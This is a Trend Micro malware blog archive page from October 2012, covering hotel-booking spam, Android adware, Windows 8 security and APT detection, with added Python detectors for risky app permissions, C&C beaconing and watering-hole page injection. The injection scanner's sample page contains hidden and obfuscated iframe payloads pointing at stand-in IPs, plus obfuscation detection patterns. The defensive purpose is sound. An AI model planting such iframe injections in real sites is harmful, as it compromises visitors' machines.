TrendLabs Malware Blog - Trend Micro

    Archive for October, 2012

    The hotel booking spam recently reported has made its way into German users’ inboxes. The email, which purports to come from the Brenners Park-Hotel and Spa in Austria, follows the same theme as its English counterpart: it contains a confirmation and the details of an alleged booking reservation.

    The sample email was sent to the personal email address of one of Trend Micro’s managers. He almost fell for it, given that he travels a lot, until he noticed the address of the hotel.

    It’s too bad the spammers aren’t as good at geography as they are at making spam: the actual Brenners Park-Hotel and Spa is in Baden-Baden, Germany, not in Austria. While he was initially looking forward to staying at the hotel, having read the excellent reviews on TripAdvisor, the email made it clear that this was, unfortunately, a scam. The good news is that the attachment was already flagged and detected by Trend Micro as BKDR_ANDROM.P.

    Posted in Malware, Spam | Gamarue Malware Goes to Germany

    It has become an inevitable part of the Android user experience that apps ask for a long laundry list of permissions. Many apps ask you to grant them network access so they can download updates. Others seek permission to read your phone’s state and identity so that incoming calls won’t interrupt what they are doing. Unfortunately, these same permissions can be abused for criminal purposes.

    Rise of Aggressive Mobile Adware

    Aside from apps abusing the permissions users grant them, we noted a significant rise in the number of aggressive mobile adware apps, as reported in our 3Q Threat Roundup, Android Under Siege: Popularity Comes at a Price. Trend Micro considers this adware “high risk”, as it poses a serious threat to users’ privacy and serves as an effective means of collecting data that can be used for suspicious purposes.

    Recently, I was testing Android apps from Google Play and, after a simple typo, I carelessly downloaded a Flash player app. Fortunately, the installed Trend Micro Mobile Security app notified me of a dangerous app.
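    The permission check that a mobile security product performs on a newly installed app can be reproduced from the app’s own manifest. The example below is added here and is not code from the original post or from Trend Micro Mobile Security: it parses the `<uses-permission>` entries of an AndroidManifest.xml, weights the ones that expose identity, location or cost money, and doubles the weight when the app also holds INTERNET, because data an app cannot send off the device is far less useful to an adware author. The sample manifest (a "Flash player" lookalike) and the `SENSITIVE` weights are constructed for this example.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample manifest (not from any real app): a "Flash player" lookalike
# that asks for far more than a media player needs.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.flashplayer">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <application android:label="Flash Player"/>
</manifest>
"""

# Constructed benign manifest: a notes app that only needs network access.
BENIGN_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
    <uses-permission android:name="android.permission.INTERNET"/>
</manifest>
"""

# Permissions that leak identity/location or cost money. The weights are
# assumptions for this example, not a published Trend Micro rating.
SENSITIVE = {
    "android.permission.READ_PHONE_STATE": ("device IMEI/IMSI and phone number", 2),
    "android.permission.ACCESS_FINE_LOCATION": ("precise location", 2),
    "android.permission.READ_CONTACTS": ("contact list", 2),
    "android.permission.GET_ACCOUNTS": ("account names and e-mail addresses", 1),
    "android.permission.RECEIVE_BOOT_COMPLETED": ("persistence across reboots", 1),
    "android.permission.SEND_SMS": ("premium-rate SMS", 3),
}


def permissions_in(manifest_xml):
    """Return the android:name of every <uses-permission> element."""
    root = ET.fromstring(manifest_xml)
    return [el.get("{%s}name" % ANDROID_NS) for el in root.iter("uses-permission")]


def assess(manifest_xml):
    """Score the manifest: sensitive permissions count double when the app can phone home."""
    perms = set(permissions_in(manifest_xml))
    has_net = "android.permission.INTERNET" in perms
    score, findings = 0, []
    for perm, (what, weight) in SENSITIVE.items():
        if perm in perms:
            score += weight * 2 if has_net else weight
            findings.append("%s: exposes %s%s" % (
                perm, what, " and can exfiltrate it" if has_net else ""))
    # Thresholds are assumed for this example.
    level = "high" if score >= 8 else "medium" if score >= 4 else "low"
    return {"permissions": sorted(perms), "score": score, "risk": level, "findings": findings}


if __name__ == "__main__":
    for name, manifest in (("flashplayer", SAMPLE_MANIFEST), ("notes", BENIGN_MANIFEST)):
        result = assess(manifest)
        print(name, result["risk"], result["score"])
        for line in result["findings"]:
            print("  ", line)
```

    Run against an APK, the manifest is binary XML, so it first has to be decoded (for example with `aapt dump xmltree` or apktool) before being fed to `assess`.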

    Posted in Mobile

    With the launch of Windows 8, Microsoft promises a rejuvenated OS and brand that translate into an improved user experience. But when it comes to security, did Microsoft take it up a notch?

    Beyond Windows 8’s interface and overall experience, users are also concerned with its resilience against threats. Below are some of my observations on certain security changes that Microsoft implemented in Windows 8.

    Windows Defender. Microsoft ships its full antimalware product (previously known as OneCare) pre-installed. Windows 7 came with an anti-spyware-only version of Windows Defender (though users could download Microsoft Security Essentials for free). Now, though, Windows Defender combines both anti-spyware and antivirus capabilities. On retail versions, users can install a security product of their choice, preferably from the Windows Store. However, if no security product is installed after two weeks, Windows 8 activates Windows Defender.

    This is a smart decision by Microsoft, as it sidesteps possible legal issues by giving users the opportunity to choose their own product first. For users who forget to install their preferred security product, Windows Defender provides a baseline level of security.



    Today’s successful targeted attacks use a combination of social engineering, malware, and backdoor activity. Though a variety of tools are available to attackers, they tend to prefer specific ones.

    While attackers can routinely create new malware executables with automated builders and embed them in documents designed to exploit vulnerabilities in popular office software, the traffic the malware generates when it communicates with its C&C server tends to remain consistent. That makes the network traffic a more durable indicator than the hash of any single executable.

    This is significant because targeted attacks are rarely a “singular set of events”; they are in fact part of ongoing campaigns. These are sustained espionage campaigns, a series of failed and successful attempts to compromise a target over time, that aim to establish a persistent and covert presence in the target network so that information can be extracted when needed.
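    Three of the traffic properties that stay constant across rebuilt binaries are the C&C check-in interval, the URI pattern of the check-in, and the User-Agent string the implant hard-codes. The script below is an added example, not code from the original post or from Trend Micro, that runs those three checks over a proxy log: it flags client/host pairs whose request gaps are too regular to be human browsing (low coefficient of variation), matches a URI signature, and flags a User-Agent a client only ever sends to a single host while its real browser reaches several. The log lines, the `SAMPLE_LOG` format (time, client, method, URL, User-Agent), the `URI_SIGNATURES` pattern and the thresholds are all constructed for this example and are not real indicators.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (not real traffic): a workstation browsing normally while an
# implant POSTs to its C&C every ~5 minutes with a hard-coded, outdated User-Agent.
SAMPLE_LOG = """\
2012-10-24T09:00:00 10.1.1.7 GET http://cdn-updates.example.net/img/photo.png Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
2012-10-24T09:00:04 10.1.1.7 GET http://cdn-updates.example.net/img/logo.gif Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
2012-10-24T09:00:09 10.1.1.7 POST http://update-srv.example.org/h/check.php?id=4a1f Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
2012-10-24T09:00:27 10.1.1.7 GET http://www.example.com/news/index.html Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
2012-10-24T09:01:02 10.1.1.7 GET http://www.example.com/news/story.html Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
2012-10-24T09:05:10 10.1.1.7 POST http://update-srv.example.org/h/check.php?id=4a1f Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
2012-10-24T09:07:45 10.1.1.7 GET http://cdn-updates.example.net/css/site.css Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
2012-10-24T09:10:09 10.1.1.7 POST http://update-srv.example.org/h/check.php?id=4a1f Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
2012-10-24T09:15:11 10.1.1.7 POST http://update-srv.example.org/h/check.php?id=4a1f Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
2012-10-24T09:20:10 10.1.1.7 POST http://update-srv.example.org/h/check.php?id=4a1f Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (.*)$")
HOST_RE = re.compile(r"^https?://([^/]+)")

# Hypothetical URI signature for a C&C check-in (assumed for this example, not a real IOC).
URI_SIGNATURES = [re.compile(r"/h/check\.php\?id=[0-9a-f]{4}$")]


def parse(log):
    """Turn log lines into event dicts; lines that do not match the format are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, method, url, ua = m.groups()
        events.append({"t": datetime.fromisoformat(ts), "client": client, "method": method,
                       "url": url, "host": HOST_RE.match(url).group(1), "ua": ua})
    return events


def find_beacons(events, min_hits=4, max_cv=0.1):
    """Flag client/host pairs whose inter-request gaps are nearly constant."""
    by_pair = defaultdict(list)
    for e in events:
        by_pair[(e["client"], e["host"])].append(e["t"])
    findings = []
    for (client, host), times in by_pair.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps)
        cv = statistics.pstdev(gaps) / mean if mean else float("inf")  # coefficient of variation
        if cv <= max_cv:
            findings.append({"client": client, "host": host, "hits": len(times),
                             "period_s": round(mean), "cv": round(cv, 3)})
    return findings


def find_signature_hits(events):
    """Requests whose URL matches a known check-in pattern."""
    return [e for e in events if any(s.search(e["url"]) for s in URI_SIGNATURES)]


def find_odd_user_agents(events):
    """Flag a User-Agent a client sends to exactly one host while another of its
    User-Agents (the real browser) reaches two or more hosts."""
    ua_hosts = defaultdict(lambda: defaultdict(set))
    for e in events:
        ua_hosts[e["client"]][e["ua"]].add(e["host"])
    odd = []
    for client, uas in ua_hosts.items():
        if max(len(hosts) for hosts in uas.values()) < 2:
            continue
        for ua, hosts in uas.items():
            if len(hosts) == 1:
                odd.append({"client": client, "ua": ua, "host": next(iter(hosts))})
    return odd


def analyze(log):
    events = parse(log)
    return {"beacons": find_beacons(events),
            "signature_hits": find_signature_hits(events),
            "odd_user_agents": find_odd_user_agents(events)}


if __name__ == "__main__":
    for kind, items in analyze(SAMPLE_LOG).items():
        print(kind)
        for item in items:
            print("  ", item)
```

    On a real proxy log the beacon check should run per day and per client with a minimum hit count high enough to ignore legitimate pollers (mail clients, update agents), and hosts that legitimately beacon belong on an allowlist; the signature and User-Agent checks are what let the same detection survive a rebuilt binary.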

    Posted in Targeted Attacks | How to Detect APT Activity with Network Traffic Analysis

    The term “watering hole” has become a popular way to describe targeted malware attacks in which the attackers compromise a legitimate website and insert a “drive-by” exploit in order to compromise the website’s visitors. Two recent papers by our friends at RSA and Symantec documented such attacks.

    Of course, such attacks are not new. This technique has long been used in indiscriminate cybercriminal attacks as well as in targeted malware attacks. I documented the use of such techniques in 2009 and 2010, and there have been more recent cases as well.

    While cybercriminals use “drive-by” exploits to indiscriminately compromise as many computers as they can, the use of this technique in APT activity is what Shadowserver aptly described as “strategic web compromises”. The objective is to selectively target visitors interested in specific content. Such attacks often emerge in conjunction with a new drive-by exploit.
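    The insertion itself usually takes one of a few shapes: a 0x0 or hidden iframe pointing at the exploit server, a `<script src>` to a host the site never used before, or an inline script that builds the iframe through `unescape`/`fromCharCode` to defeat simple grep. The scanner below is an added example, not code from the original post or from Trend Micro, that walks a fetched page with the standard-library HTML parser and reports those three patterns, treating anything off the site’s own host and not on an allowlist as suspect. The page, the site host `www.example-thinktank.org` and the `ALLOWED_HOSTS` allowlist are constructed for this example.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.example-thinktank.org"        # the legitimate site being checked (assumed)
ALLOWED_HOSTS = ("stats.example-cdn.net",)     # third-party hosts the site is known to use (assumed)

# Constructed page: a legitimate article with an injected hidden iframe and an
# obfuscated inline script that writes a second iframe at load time.
SAMPLE_PAGE = """<html><head><title>Policy brief</title>
<script src="/js/site.js"></script>
<script src="http://stats.example-cdn.net/x.js"></script>
</head><body>
<h1>Policy brief</h1><p>Legitimate content.</p>
<iframe src="http://203.0.113.5/ad/index.php" width="1" height="1" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3Ciframe%20src%3D%22http%3A//198.51.100.9/l.php%22%20width%3D0%20height%3D0%3E%3C/iframe%3E'));</script>
</body></html>"""

IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
OBFUSCATION_RE = re.compile(r"\b(unescape|fromCharCode|eval)\s*\(", re.I)


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings for iframes and scripts typical of a drive-by insert."""

    def __init__(self, site_host, allowed_hosts=()):
        super().__init__()
        self.allowed = set(allowed_hosts) | {site_host}
        self.findings = []
        self._in_inline_script = False

    def _off_site(self, url):
        host = urlparse(url).hostname
        return host is not None and host not in self.allowed

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            style = a.get("style", "").replace(" ", "").lower()
            tiny = all(a.get(d, "").rstrip("px") in ("0", "1") for d in ("width", "height"))
            hidden = tiny or "display:none" in style or "visibility:hidden" in style
            if hidden or self._off_site(a.get("src", "")):
                self.findings.append(("hidden-or-offsite-iframe", a.get("src", "")))
        elif tag == "script":
            src = a.get("src")
            if src is None:
                self._in_inline_script = True       # body arrives via handle_data
            elif self._off_site(src):
                kind = "script-from-bare-ip" if IPV4_RE.match(urlparse(src).hostname) else "offsite-script"
                self.findings.append((kind, src))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline_script = False

    def handle_data(self, data):
        # An inline script that decodes and document.write()s markup is the classic obfuscated insert.
        if self._in_inline_script and "document.write" in data and OBFUSCATION_RE.search(data):
            self.findings.append(("obfuscated-inline-script", data.strip()[:60]))


def scan(html, site_host, allowed_hosts=()):
    scanner = InjectionScanner(site_host, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_PAGE, SITE_HOST, ALLOWED_HOSTS):
        print(kind, detail)
```

    Without the allowlist the CDN script is reported too, which is the right default for a site you do not know; in practice the scan is most useful as a diff against a known-good copy of the page, since a strategic web compromise is defined by what changed on an otherwise trusted site.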

    Posted in Malware | Watering Holes and Zero-Day Attacks


    © Copyright 2013 Trend Micro Inc. All rights reserved.